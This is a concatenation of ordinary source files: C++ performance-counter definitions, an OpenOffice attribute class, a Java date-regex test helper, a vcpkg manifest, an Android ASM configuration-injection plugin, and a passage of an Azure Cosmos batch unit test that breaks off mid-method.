req/sec", L"Incoming (name owner) delete name requests per second") RATE_COUNTER( 5, L"Name Exists req/sec", L"Incoming name exists requests per second") RATE_COUNTER( 6, L"AO Create Service req/sec", L"Incoming (authority owner) create service requests per second") RATE_COUNTER( 7, L"AO Update Service req/sec", L"Incoming (authority owner) update service requests per second") RATE_COUNTER( 8, L"AO Delete Service req/sec", L"Incoming (authority owner) delete service requests per second") RATE_COUNTER( 9, L"NO Create Service req/sec", L"Incoming (name owner) create service requests per second") RATE_COUNTER( 10, L"NO Update Service req/sec", L"Incoming (name owner) update service requests per second") RATE_COUNTER( 11, L"NO Delete Service req/sec", L"Incoming (name owner) delete service requests per second") RATE_COUNTER( 12, L"Enumerate Names req/sec", L"Incoming enumerate names requests per second") RATE_COUNTER( 13, L"Enumerate Properties req/sec", L"Incoming enumerate properties requests per second") RATE_COUNTER( 14, L"Property Batch req/sec", L"Incoming property batch per second") RATE_COUNTER( 15, L"Get Service Description req/sec", L"Incoming get service description requests per second") RATE_COUNTER( 16, L"Prefix Resolve req/sec", L"Incoming prefix resolve requests per second") RATE_COUNTER( 17, L"Unrecognized Operation req/sec", L"Incoming unrecognized operation per second") AVG_BASE( 1, L"Base for AO Create Name avg. duration (us)" ) AVG_BASE( 2, L"Base for AO Delete Name avg. duration (us)" ) AVG_BASE( 3, L"Base for NO Create Name avg. duration (us)" ) AVG_BASE( 4, L"Base for NO Delete Name avg. duration (us)" ) AVG_BASE( 5, L"Base for Name Exists avg. duration (us)" ) AVG_BASE( 6, L"Base for AO Create Service avg. 
duration (us)" ) AVG_BASE( 7, L"Base for AO Update Service avg. duration (us)" ) AVG_BASE( 8, L"Base for AO Delete Service avg. duration (us)" ) AVG_BASE( 9, L"Base for NO Create Service avg. duration (us)" ) AVG_BASE( 10, L"Base for NO Update Service avg. duration (us)" ) AVG_BASE( 11, L"Base for NO Delete Service avg. duration (us)" ) AVG_BASE( 12, L"Base for Enumerate Names avg. duration (us)" ) AVG_BASE( 13, L"Base for Enumerate Properties avg. duration (us)" ) AVG_BASE( 14, L"Base for Property Batch avg. duration (us)" ) AVG_BASE( 15, L"Base for Get Service Description avg. duration (us)" ) AVG_BASE( 16, L"Base for Prefix Resolve avg. duration (us)" ) AVG_BASE( 17, L"Base for Unrecognized Operation avg. duration (us)" ) DURATION_COUNTER( 1, L"AO Create Name avg. duration (us)", L"Average (authority owner) create name processing time in microseconds") DURATION_COUNTER( 2, L"AO Delete Name avg. duration (us)", L"Average (authority owner) delete name processing time in microseconds") DURATION_COUNTER( 3, L"NO Create Name avg. duration (us)", L"Average (name owner) create name processing time in microseconds") DURATION_COUNTER( 4, L"NO Delete Name avg. duration (us)", L"Average (name owner) delete name processing time in microseconds") DURATION_COUNTER( 5, L"Name Exists avg. duration (us)", L"Average name exists processing time in microseconds") DURATION_COUNTER( 6, L"AO Create Service avg. duration (us)", L"Average (authority owner) create service processing time in microseconds") DURATION_COUNTER( 7, L"AO Update Service avg. duration (us)", L"Average (authority owner) update service processing time in microseconds") DURATION_COUNTER( 8, L"AO Delete Service avg. duration (us)", L"Average (authority owner) delete service processing time in microseconds") DURATION_COUNTER( 9, L"NO Create Service avg. duration (us)", L"Average (name owner) create service processing time in microseconds") DURATION_COUNTER( 10, L"NO Update Service avg. duration (us)", L"Average (name owner) update service processing time in microseconds") DURATION_COUNTER( 11, L"NO Delete Service avg. duration (us)", L"Average (name owner) delete service processing time in microseconds") DURATION_COUNTER( 12, L"Enumerate Names avg. duration (us)", L"Average enumerate names processing time in microseconds") DURATION_COUNTER( 13, L"Enumerate Properties avg. duration (us)", L"Average enumerate properties processing time in microseconds") DURATION_COUNTER( 14, L"Property Batch avg. duration (us)", L"Incoming property batch per second") DURATION_COUNTER( 15, L"Get Service Description avg. duration (us)", L"Average get service description processing time in microseconds") DURATION_COUNTER( 16, L"Prefix Resolve avg. duration (us)", L"Average prefix resolution processing time in microseconds") DURATION_COUNTER( 17, L"Unrecognized Operation avg. 
duration (us)", L"Incoming unrecognized operation processing time in microseconds") END_COUNTER_SET_DEFINITION() DECLARE_COUNTER_INSTANCE( RateOfAOCreateName ) DECLARE_COUNTER_INSTANCE( RateOfAODeleteName ) DECLARE_COUNTER_INSTANCE( RateOfNOCreateName ) DECLARE_COUNTER_INSTANCE( RateOfNODeleteName ) DECLARE_COUNTER_INSTANCE( RateOfNameExists ) DECLARE_COUNTER_INSTANCE( RateOfAOCreateService ) DECLARE_COUNTER_INSTANCE( RateOfAOUpdateService ) DECLARE_COUNTER_INSTANCE( RateOfAODeleteService ) DECLARE_COUNTER_INSTANCE( RateOfNOCreateService ) DECLARE_COUNTER_INSTANCE( RateOfNOUpdateService ) DECLARE_COUNTER_INSTANCE( RateOfNODeleteService ) DECLARE_COUNTER_INSTANCE( RateOfEnumerateNames ) DECLARE_COUNTER_INSTANCE( RateOfEnumerateProperties ) DECLARE_COUNTER_INSTANCE( RateOfPropertyBatch ) DECLARE_COUNTER_INSTANCE( RateOfGetServiceDescription ) DECLARE_COUNTER_INSTANCE( RateOfPrefixResolve ) DECLARE_COUNTER_INSTANCE( RateOfInvalidOperation ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteNameBase ) DECLARE_COUNTER_INSTANCE( DurationOfNameExistsBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOUpdateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNOUpdateServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteServiceBase ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateNamesBase ) DECLARE_COUNTER_INSTANCE( DurationOfEnumeratePropertiesBase ) DECLARE_COUNTER_INSTANCE( DurationOfPropertyBatchBase ) DECLARE_COUNTER_INSTANCE( DurationOfGetServiceDescriptionBase ) DECLARE_COUNTER_INSTANCE( DurationOfPrefixResolveBase ) DECLARE_COUNTER_INSTANCE( DurationOfInvalidOperationBase ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateName ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteName ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateName ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteName ) DECLARE_COUNTER_INSTANCE( DurationOfNameExists ) DECLARE_COUNTER_INSTANCE( DurationOfAOCreateService ) DECLARE_COUNTER_INSTANCE( DurationOfAOUpdateService ) DECLARE_COUNTER_INSTANCE( DurationOfAODeleteService ) DECLARE_COUNTER_INSTANCE( DurationOfNOCreateService ) DECLARE_COUNTER_INSTANCE( DurationOfNOUpdateService ) DECLARE_COUNTER_INSTANCE( DurationOfNODeleteService ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateNames ) DECLARE_COUNTER_INSTANCE( DurationOfEnumerateProperties ) DECLARE_COUNTER_INSTANCE( DurationOfPropertyBatch ) DECLARE_COUNTER_INSTANCE( DurationOfGetServiceDescription ) DECLARE_COUNTER_INSTANCE( DurationOfPrefixResolve ) DECLARE_COUNTER_INSTANCE( DurationOfInvalidOperation ) BEGIN_COUNTER_SET_INSTANCE(NamingPerformanceCounters) DEFINE_RATE_COUNTER( 1, RateOfAOCreateName ) DEFINE_RATE_COUNTER( 2, RateOfAODeleteName ) DEFINE_RATE_COUNTER( 3, RateOfNOCreateName ) DEFINE_RATE_COUNTER( 4, RateOfNODeleteName ) DEFINE_RATE_COUNTER( 5, RateOfNameExists ) DEFINE_RATE_COUNTER( 6, RateOfAOCreateService ) DEFINE_RATE_COUNTER( 7, RateOfAOUpdateService ) DEFINE_RATE_COUNTER( 8, RateOfAODeleteService ) DEFINE_RATE_COUNTER( 9, RateOfNOCreateService ) DEFINE_RATE_COUNTER( 10, RateOfNOUpdateService ) DEFINE_RATE_COUNTER( 11, RateOfNODeleteService ) DEFINE_RATE_COUNTER( 12, RateOfEnumerateNames ) DEFINE_RATE_COUNTER( 13, RateOfEnumerateProperties ) DEFINE_RATE_COUNTER( 14, RateOfPropertyBatch ) 
DEFINE_RATE_COUNTER( 15, RateOfGetServiceDescription ) DEFINE_RATE_COUNTER( 16, RateOfPrefixResolve ) DEFINE_RATE_COUNTER( 17, RateOfInvalidOperation ) DEFINE_AVG_BASE_COUNTER( 1, DurationOfAOCreateNameBase ) DEFINE_AVG_BASE_COUNTER( 2, DurationOfAODeleteNameBase ) DEFINE_AVG_BASE_COUNTER( 3, DurationOfNOCreateNameBase ) DEFINE_AVG_BASE_COUNTER( 4, DurationOfNODeleteNameBase ) DEFINE_AVG_BASE_COUNTER( 5, DurationOfNameExistsBase ) DEFINE_AVG_BASE_COUNTER( 6, DurationOfAOCreateServiceBase ) DEFINE_AVG_BASE_COUNTER( 7, DurationOfAOUpdateServiceBase ) DEFINE_AVG_BASE_COUNTER( 8, DurationOfAODeleteServiceBase ) DEFINE_AVG_BASE_COUNTER( 9, DurationOfNOCreateServiceBase ) DEFINE_AVG_BASE_COUNTER( 10, DurationOfNOUpdateServiceBase ) DEFINE_AVG_BASE_COUNTER( 11, DurationOfNODeleteServiceBase ) DEFINE_AVG_BASE_COUNTER( 12, DurationOfEnumerateNamesBase ) DEFINE_AVG_BASE_COUNTER( 13, DurationOfEnumeratePropertiesBase ) DEFINE_AVG_BASE_COUNTER( 14, DurationOfPropertyBatchBase ) DEFINE_AVG_BASE_COUNTER( 15, DurationOfGetServiceDescriptionBase ) DEFINE_AVG_BASE_COUNTER( 16, DurationOfPrefixResolveBase ) DEFINE_AVG_BASE_COUNTER( 17, DurationOfInvalidOperationBase ) DEFINE_DURATION_COUNTER( 1, DurationOfAOCreateName ) DEFINE_DURATION_COUNTER( 2, DurationOfAODeleteName ) DEFINE_DURATION_COUNTER( 3, DurationOfNOCreateName ) DEFINE_DURATION_COUNTER( 4, DurationOfNODeleteName ) DEFINE_DURATION_COUNTER( 5, DurationOfNameExists ) DEFINE_DURATION_COUNTER( 6, DurationOfAOCreateService ) DEFINE_DURATION_COUNTER( 7, DurationOfAOUpdateService ) DEFINE_DURATION_COUNTER( 8, DurationOfAODeleteService ) DEFINE_DURATION_COUNTER( 9, DurationOfNOCreateService ) DEFINE_DURATION_COUNTER( 10, DurationOfNOUpdateService ) DEFINE_DURATION_COUNTER( 11, DurationOfNODeleteService ) DEFINE_DURATION_COUNTER( 12, DurationOfEnumerateNames ) DEFINE_DURATION_COUNTER( 13, DurationOfEnumerateProperties ) DEFINE_DURATION_COUNTER( 14, DurationOfPropertyBatch ) DEFINE_DURATION_COUNTER( 15, DurationOfGetServiceDescription ) DEFINE_DURATION_COUNTER( 16, DurationOfPrefixResolve ) DEFINE_DURATION_COUNTER( 17, DurationOfInvalidOperation ) END_COUNTER_SET_INSTANCE() }; typedef std::shared_ptr<NamingPerformanceCounters> PerformanceCountersSPtr; }
5,832
679
/************************************************************** * * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * *************************************************************/ #include "precompiled_svx.hxx" #include <svx/sdr/attribute/sdrlinefillshadowtextattribute.hxx> ////////////////////////////////////////////////////////////////////////////// namespace drawinglayer { namespace attribute { SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute( const SdrLineAttribute& rLine, const SdrFillAttribute& rFill, const SdrLineStartEndAttribute& rLineStartEnd, const SdrShadowAttribute& rShadow, const FillGradientAttribute& rFillFloatTransGradient, const SdrTextAttribute& rTextAttribute) : SdrLineShadowTextAttribute(rLine, rLineStartEnd, rShadow, rTextAttribute), maFill(rFill), maFillFloatTransGradient(rFillFloatTransGradient) { } SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute() : SdrLineShadowTextAttribute(), maFill(), maFillFloatTransGradient() { } SdrLineFillShadowTextAttribute::SdrLineFillShadowTextAttribute(const SdrLineFillShadowTextAttribute& rCandidate) : SdrLineShadowTextAttribute(rCandidate), maFill(rCandidate.getFill()), maFillFloatTransGradient(rCandidate.getFillFloatTransGradient()) { } SdrLineFillShadowTextAttribute& SdrLineFillShadowTextAttribute::operator=(const SdrLineFillShadowTextAttribute& rCandidate) { SdrLineShadowTextAttribute::operator=(rCandidate); maFill = rCandidate.getFill(); maFillFloatTransGradient = rCandidate.getFillFloatTransGradient(); return *this; } bool SdrLineFillShadowTextAttribute::isDefault() const { return (SdrLineShadowTextAttribute::isDefault() && getFill().isDefault() && getFillFloatTransGradient().isDefault()); } bool SdrLineFillShadowTextAttribute::operator==(const SdrLineFillShadowTextAttribute& rCandidate) const { return(SdrLineShadowTextAttribute::operator==(rCandidate) && getFill() == rCandidate.getFill() && getFillFloatTransGradient() == rCandidate.getFillFloatTransGradient()); } } // end of namespace attribute } // end of namespace drawinglayer ////////////////////////////////////////////////////////////////////////////// // eof
930
32,544
<filename>core-java/src/test/java/com/baeldung/regexp/datepattern/gregorian/testhelper/GregorianDateTestHelper.java package com.baeldung.regexp.datepattern.gregorian.testhelper; import com.baeldung.regexp.datepattern.DateMatcher; import org.junit.Assert; public class GregorianDateTestHelper { private final DateMatcher matcher; public GregorianDateTestHelper(DateMatcher matcher) { this.matcher = matcher; } public void assertFormat() { Assert.assertTrue(matcher.matches("2017-12-31")); Assert.assertTrue(matcher.matches("2018-01-01")); Assert.assertFalse(matcher.matches("2018-02")); Assert.assertFalse(matcher.matches("2018-02-01-01")); Assert.assertFalse(matcher.matches("2018-02-XX")); Assert.assertFalse(matcher.matches(" 2018-02-01")); Assert.assertFalse(matcher.matches("2018-02-01 ")); Assert.assertFalse(matcher.matches("2020/02/28")); Assert.assertFalse(matcher.matches("2020.02.29")); } public void assertRange() { Assert.assertTrue(matcher.matches("1900-01-01")); Assert.assertTrue(matcher.matches("2205-05-25")); Assert.assertTrue(matcher.matches("2999-12-31")); Assert.assertFalse(matcher.matches("1899-12-31")); Assert.assertFalse(matcher.matches("2018-05-35")); Assert.assertFalse(matcher.matches("2018-13-05")); Assert.assertFalse(matcher.matches("3000-01-01")); Assert.assertFalse(matcher.matches("3200-02-29")); } public void assertFebruary29th() { Assert.assertTrue(matcher.matches("2000-02-29")); Assert.assertTrue(matcher.matches("2400-02-29")); Assert.assertTrue(matcher.matches("2800-02-29")); Assert.assertTrue(matcher.matches("2020-02-29")); Assert.assertTrue(matcher.matches("2024-02-29")); Assert.assertTrue(matcher.matches("2028-02-29")); Assert.assertFalse(matcher.matches("2017-02-29")); Assert.assertFalse(matcher.matches("2018-02-29")); Assert.assertFalse(matcher.matches("2019-02-29")); Assert.assertFalse(matcher.matches("2100-02-29")); Assert.assertFalse(matcher.matches("2200-02-29")); Assert.assertFalse(matcher.matches("2300-02-29")); } public void assertFebruaryGeneralDates() { Assert.assertTrue(matcher.matches("2018-02-01")); Assert.assertTrue(matcher.matches("2019-02-13")); Assert.assertTrue(matcher.matches("2020-02-25")); Assert.assertFalse(matcher.matches("2000-02-30")); Assert.assertFalse(matcher.matches("2400-02-62")); Assert.assertFalse(matcher.matches("2420-02-94")); } public void assertMonthsOf30Days() { Assert.assertTrue(matcher.matches("2018-04-30")); Assert.assertTrue(matcher.matches("2019-06-30")); Assert.assertTrue(matcher.matches("2020-09-30")); Assert.assertTrue(matcher.matches("2021-11-30")); Assert.assertTrue(matcher.matches("2022-04-02")); Assert.assertTrue(matcher.matches("2023-06-14")); Assert.assertTrue(matcher.matches("2024-09-26")); Assert.assertFalse(matcher.matches("2018-04-31")); Assert.assertFalse(matcher.matches("2019-06-31")); Assert.assertFalse(matcher.matches("2020-09-31")); Assert.assertFalse(matcher.matches("2021-11-31")); Assert.assertFalse(matcher.matches("2022-04-32")); Assert.assertFalse(matcher.matches("2023-06-64")); Assert.assertFalse(matcher.matches("2024-09-96")); } public void assertMonthsOf31Dates() { Assert.assertTrue(matcher.matches("2018-01-31")); Assert.assertTrue(matcher.matches("2019-03-31")); Assert.assertTrue(matcher.matches("2020-05-31")); Assert.assertTrue(matcher.matches("2021-07-31")); Assert.assertTrue(matcher.matches("2022-08-31")); Assert.assertTrue(matcher.matches("2023-10-31")); Assert.assertTrue(matcher.matches("2024-12-31")); Assert.assertTrue(matcher.matches("2025-01-03")); 
Assert.assertTrue(matcher.matches("2026-03-15")); Assert.assertTrue(matcher.matches("2027-05-27")); Assert.assertFalse(matcher.matches("2018-01-32")); Assert.assertFalse(matcher.matches("2019-03-64")); Assert.assertFalse(matcher.matches("2020-05-96")); } }
1,964
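The helper above only needs something that can answer matches(String); assuming DateMatcher is that single-method interface, it can be satisfied with a lambda for a quick smoke test (the regex is a deliberately naive placeholder):

DateMatcher formatOnly = date -> date.matches("\\d{4}-\\d{2}-\\d{2}");
GregorianDateTestHelper helper = new GregorianDateTestHelper(formatOnly);
helper.assertFormat();    // passes: these probes only exercise the yyyy-MM-dd shape
// helper.assertRange();  // would fail: the naive pattern accepts years outside 1900-2999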
10,876
<filename>ports/libdisasm/vcpkg.json { "name": "libdisasm", "version-string": "0.23", "port-version": 9, "description": "x86 Disassembler Library.", "homepage": "https://sourceforge.net/projects/bastard", "dependencies": [ { "name": "vcpkg-cmake", "host": true } ] }
130
454
package com.zfy.social.plugin; import com.zfy.social.plugin.extension.ConfigExt; import com.zfy.social.plugin.extension.Settings; import com.zfy.social.plugin.extension.SocialExt; import com.zfy.social.plugin.lib.AbstractClassVisitor; import com.zfy.social.plugin.lib.TransformX; import com.zfy.social.plugin.lib.UtilX; import org.objectweb.asm.ClassVisitor; import org.objectweb.asm.ClassWriter; import org.objectweb.asm.MethodVisitor; import org.objectweb.asm.Opcodes; import java.util.function.Function; /** * CreateAt : 2020-01-20 * Describe : 访问 class 工具 * * @author chendong */ public class SocialClassVisitorImpl extends AbstractClassVisitor { public static Factory factory = new Factory(); public SocialClassVisitorImpl(ClassVisitor classVisitor) { super(classVisitor); } static class Factory implements Function<ClassWriter, ClassVisitor> { @Override public ClassVisitor apply(ClassWriter classWriter) { return new SocialClassVisitorImpl(classWriter); } } @Override public MethodVisitor watch(MethodVisitor visitor, ClassInfo classInfo, MethodInfo methodInfo) { if ("com/zfy/social/core/SocialOptions$Builder".equals(classInfo.name)) { if ("initConfigByAsm".equals(methodInfo.name)) { UtilX.log("找到 SocialOptions$Builder initConfigByAsm"); return new SocialMethodVisitorImpl(visitor); } } return super.watch(visitor, classInfo, methodInfo); } static class SocialMethodVisitorImpl extends MethodVisitor { public SocialMethodVisitorImpl(MethodVisitor mv) { super(Opcodes.ASM4, mv); } @Override public void visitCode() { SocialExt socialExt = SocialPlugin.getSocialExt(); ConfigExt wx = socialExt.wx; if (wx.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wx.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxAppId", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wx.appSecret); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxSecretKey", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(wx.onlyAuthCode ? 
Opcodes.ICONST_1 : Opcodes.ICONST_0); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wxOnlyAuthCode", "Z"); } ConfigExt qq = socialExt.qq; if (qq.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "qqEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(qq.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "qqAppId", "Ljava/lang/String;"); } ConfigExt wb = socialExt.wb; if (wb.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wb.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbAppId", "Ljava/lang/String;"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(wb.url); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbRedirectUrl", "Ljava/lang/String;"); } ConfigExt dd = socialExt.dd; if (dd.enable) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(Opcodes.ICONST_1); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "ddEnable", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(dd.appId); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "ddAppId", "Ljava/lang/String;"); } mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.shareSuccessIfStay)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "shareSuccessIfStay", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitIntInsn(Opcodes.BIPUSH, socialExt.tokenExpiresHours); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "tokenExpiresHours", "I"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.useGson)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "useGson", "Z"); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitInsn(TransformX.toAsmBool(socialExt.useOkHttp)); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "useOkHttp", "Z"); if (socialExt.appName != null) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(socialExt.appName); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "appName", "Ljava/lang/String;"); } if (socialExt.color != null) { mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitLdcInsn(socialExt.color); mv.visitMethodInsn(Opcodes.INVOKESTATIC, "android/graphics/Color", "parseColor", "(Ljava/lang/String;)I", false); mv.visitFieldInsn(Opcodes.PUTFIELD, "com/zfy/social/core/SocialOptions$Builder", "wbProgressColor", "I"); } for (String name : Settings.platformClassList) { String pkgClassPath = TransformX.toPkgClassPath(name); mv.visitVarInsn(Opcodes.ALOAD, 0); mv.visitFieldInsn(Opcodes.GETFIELD, "com/zfy/social/core/SocialOptions$Builder", "factoryClassList", "Ljava/util/Set;"); mv.visitLdcInsn(pkgClassPath); mv.visitMethodInsn(Opcodes.INVOKEINTERFACE, "java/util/Set", "add", "(Ljava/lang/Object;)Z", true); mv.visitInsn(Opcodes.POP); } super.visitCode(); UtilX.log("结束 visit code"); } } }
3,495
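The visitor above is meant to run inside an ASM rewrite of com.zfy.social.core.SocialOptions$Builder; a minimal sketch of that wiring with the stock ASM ClassReader/ClassWriter pair (classBytes stands in for the class-file bytes handed over by the Gradle transform):

static byte[] patch(byte[] classBytes) {
    ClassReader reader = new ClassReader(classBytes);
    ClassWriter writer = new ClassWriter(reader, ClassWriter.COMPUTE_MAXS);
    ClassVisitor visitor = SocialClassVisitorImpl.factory.apply(writer);
    reader.accept(visitor, 0);        // initConfigByAsm picks up the injected field writes
    return writer.toByteArray();
}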
1,350
<filename>sdk/cosmos/azure-cosmos/src/test/java/com/azure/cosmos/implementation/batch/PartitionKeyRangeServerBatchRequestTests.java<gh_stars>1000+ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. package com.azure.cosmos.implementation.batch; import com.azure.cosmos.implementation.JsonSerializable; import com.azure.cosmos.implementation.apachecommons.lang.StringUtils; import com.azure.cosmos.models.CosmosItemOperation; import com.azure.cosmos.models.CosmosItemOperationType; import com.azure.cosmos.models.PartitionKey; import org.testng.annotations.Test; import java.util.ArrayList; import java.util.List; import static org.assertj.core.api.Assertions.assertThat; public class PartitionKeyRangeServerBatchRequestTests { private static final int TIMEOUT = 40000; private CosmosItemOperation createItemBulkOperation(String id) { ItemBulkOperation<?, ?> operation = new ItemBulkOperation<>( CosmosItemOperationType.CREATE, id, PartitionKey.NONE, null, null, null ); return operation; } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void fitsAllOperations() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ createItemBulkOperation(""); createItemBulkOperation(""); }}; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, 200000, 2); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(operations.size()); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations()).isEqualTo(operations); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isZero(); } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void overflowsBasedOnCount() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ add(createItemBulkOperation("1")); add(createItemBulkOperation("2")); add(createItemBulkOperation("3")); }}; // Setting max count to 0, at least one element will always get added ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations, 200000, 0); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(1); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().get(0).getId()).isEqualTo(operations.get(0).getId()); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isEqualTo(2); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(0).getId()).isEqualTo(operations.get(1).getId()); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(1).getId()).isEqualTo(operations.get(2).getId()); } @Test(groups = {"unit"}, timeOut = TIMEOUT) public void overflowsBasedOnCountWithOffset() { List<CosmosItemOperation> operations = new ArrayList<CosmosItemOperation>() {{ add(createItemBulkOperation("1")); add(createItemBulkOperation("2")); add(createItemBulkOperation("3")); }}; // Setting max count to 1 ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequest.createBatchRequest( "0", operations.subList(1, 3), 200000, 1); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(1); // The first element is not taken into account due to an Offset of 1 assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().get(0).getId()).isEqualTo(operations.get(1).getId()); 
assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()).isEqualTo(1); assertThat(serverOperationBatchRequest.getBatchPendingOperations().get(0).getId()).isEqualTo(operations.get(2).getId()); } @Test(groups = {"unit"}, timeOut = TIMEOUT * 100) public void partitionKeyRangeServerBatchRequestSizeTests() { int docSizeInBytes = 250; int operationCount = 10; for (int expectedOperationCount : new int[] { 1, 2, 5, 10 }) { PartitionKeyRangeServerBatchRequestTests. verifyServerRequestCreationsBySizeAsync(expectedOperationCount, operationCount, docSizeInBytes); PartitionKeyRangeServerBatchRequestTests. verifyServerRequestCreationsByCountAsync(expectedOperationCount, operationCount, docSizeInBytes); } } private static void verifyServerRequestCreationsBySizeAsync( int expectedOperationCount, int operationCount, int docSizeInBytes) { int perDocOverheadEstimateInBytes = 50; int maxServerRequestBodyLength = (docSizeInBytes + perDocOverheadEstimateInBytes) * expectedOperationCount; int maxServerRequestOperationCount = Integer.MAX_VALUE; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequestTests. getBatchWithCreateOperationsAsync(operationCount, maxServerRequestBodyLength, maxServerRequestOperationCount, docSizeInBytes); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(expectedOperationCount); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()). isEqualTo(operationCount - serverOperationBatchRequest.getBatchRequest().getOperations().size()); } private static void verifyServerRequestCreationsByCountAsync( int expectedOperationCount, int operationCount, int docSizeInBytes) { int maxServerRequestBodyLength = Integer.MAX_VALUE; ServerOperationBatchRequest serverOperationBatchRequest = PartitionKeyRangeServerBatchRequestTests. getBatchWithCreateOperationsAsync(operationCount, maxServerRequestBodyLength, expectedOperationCount, docSizeInBytes); assertThat(serverOperationBatchRequest.getBatchRequest().getOperations().size()).isEqualTo(expectedOperationCount); assertThat(serverOperationBatchRequest.getBatchPendingOperations().size()). isEqualTo(operationCount - serverOperationBatchRequest.getBatchRequest().getOperations().size()); } private static ServerOperationBatchRequest getBatchWithCreateOperationsAsync( int operationCount, int maxServerRequestBodyLength, int maxServerRequestOperationCount, int docSizeInBytes) { List<CosmosItemOperation> operations = new ArrayList<>(); for 